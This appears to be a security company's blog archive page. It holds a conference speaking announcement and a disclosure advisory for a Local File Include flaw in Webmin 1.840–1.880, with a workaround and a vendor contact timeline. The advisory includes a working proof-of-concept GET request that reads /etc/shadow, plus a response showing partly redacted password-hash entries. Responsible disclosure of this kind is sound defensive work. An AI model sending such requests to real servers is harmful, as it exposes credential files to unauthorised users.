Archives for March 2018

International Conference of Big Data in Cyber Security

International Conference of Big Data in Cyber Security

Our CEO, David Stubley will be speaking in Edinburgh at the International Conference on Big Data in Cyber Security on the 31st May 2018 at Napier University. With the threats to organisations increasing day by day, many organisations are moving towards SIEM (Secure Incident Event Management) to detect malicious activity. SIEM is now being applied in many different processes across the industry including security monitoring, incident response and cyber crime investigation.

The big data conference brings together industry, academia and law enforcement to share insights, ideas, expertise and resources in responding to current security challenges, and to look at the opportunities and challenges in managing and using big data in a cyber security context. The conference also aims to showcase a good practice in industry and network investigations.

The conference hopes to cover the following areas:

  • insights into current high-profile security incidents, their impact, and how they are reported.
  • impact of GDPR.
  • key threats and risks associated with losing business critical data.
  • leading tools, techniques and insights in network threat analysis, detection and investigation.
  • best practice in implementing SIEM strategy.
  • developing and testing effective incident response.
  • evolution of the Security Operations Centre (SOC) and its emerging future requirements.
  • the need for skills, knowledge and awareness across an organisation.
  • latest research and innovation around threat discovery, machine learning, and data analysis.

David Stubley will be discussing ‘threat hunting in the Office 365 ecosystem’ at 2 pm in the Lindsay Stewart Theatre.

If you would like to know more about how we approach incident response, then please get in touch with our team.

Webmin 1.840 – 1.880 – Unrestricted Access to Arbitrary Files using Local File Include

Advisory Information

Title:Webmin 1.840 – 1.880 – Unrestricted Access to Arbitrary Files Using Local File Include

Date Published: 14/03/2018

Advisory Summary

The application allows a restricted Linux user to obtain arbitrary local system files via a Local File Include vulnerability.

Vendor

Webmin

Affected Software

Product Version
Webmin 1.840 & 1.880

Description of Issue

Unix server users who are otherwise restricted from reading root level or system files are granted permission to read system level or root only files in a default installation of Webmin 1.840/1.880 server. As a result of weak default configuration settings, limited users have full access rights to the underlying Unix system files, allowing the user to read sensitive data from the local system such as ‘/etc/shadow’.

PoC

The following GET request shows the use of a direct URL to obtain local files through the Local File Include vulnerability:




GET /syslog/save_log.cgi?view=1&file=/etc/shadow HTTP/1.1

Host: 192.168.75.150:10000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate

The Webmin application server responds with a ‘200 OK’ and includes the file normally restricted to limited users of the system:




HTTP/1.0 200 Document follows

Date: Thu, 8 Mar 2018 20:41:28 GMT

Server: MiniServ/1.880

Connection: close

proxy:*:17288:0:99999:7:::
www-data:*:17288:0:99999:7:::
mysql:!:17542:0:99999:7:::
opsview:!:17542::::::
nagios:!:17542::::::
snmp:*:17542:0:99999:7:::
admin:$1$**SNIP**/5sl29PP0a.:17542:0:99999:7:::


The following screenshot shows the web view display of the file loaded:

Webmin default configuration

A number of settings exist within the Webmin Administrator control panel to restrict users from accessing sensitive system files. However, by default, these settings are not enforced when a new installation of Webmin 1.840/1.880 is deployed within an environment. Of specific note would be the setting that enables all files to be viewed as a log file. The default setting within the Webmin server for this is set to ‘yes’. This allows the restricted user to load sensitive system files via the Local File Include function of the web application.

Remediation

The issue has not been patched yet.

Workaround

Administrators of Webmin server should manually set the following access control options within the configuration to further protect sensitive system files from being read by otherwise restricted users.

Webmin > Webmin Users > Webmin Groups > Select Group  > Available Webmin Modules > System Logs

  •       Can view any files as a log? – ‘No’

 

Timeline

  • Initial email contact to vendor via security email address noted on website – 8th March 2018.

  • Email reply from Webmin explaining that Webmin users have root-equivalent access to the underlying system. Also, to advise to restrict the directory in which users have access to via Webmin – 9th March 2018.

  • Email reply to Webmin to advise that such measures explained in previous reply, do not limit access to restricted files with a walkthrough of the issue in easier steps – 9th March 2018.

  • Further email to Webmin to explain that only one setting “Can view any file as a log” is the only setting that prohibits restricted users from viewing arbitrary files via Webmin – 9th March 2018.

  • Additional email to Webmin to explain the ‘referer_none=1’ default setting which prohibits access on default installations of Webmin can be bypassed using the Referer HTTP Header – 9th March 2018.

  • Email reply from Webmin explaining that it is correct that the setting “Can view any files as a log” will prohibit user access to sensitive files – 9th March 2018.

  • Email to Webmin to explain that the issue exists in version 1.880 and the it is advisable to set the default configuration of Webmin to restrict the setting “Can view any file as a log” and that a blog post will be made available to the wider community informing them of the issue to further protect system administrators of arbitrary file access to the system – 10th March 2018.

  • Reply from Webmin to agree that permissions in Webmin are different to what you would expect from Linux and that a blog post would be useful – 11th March 2018.

  • Advisory Released – 14th March 2018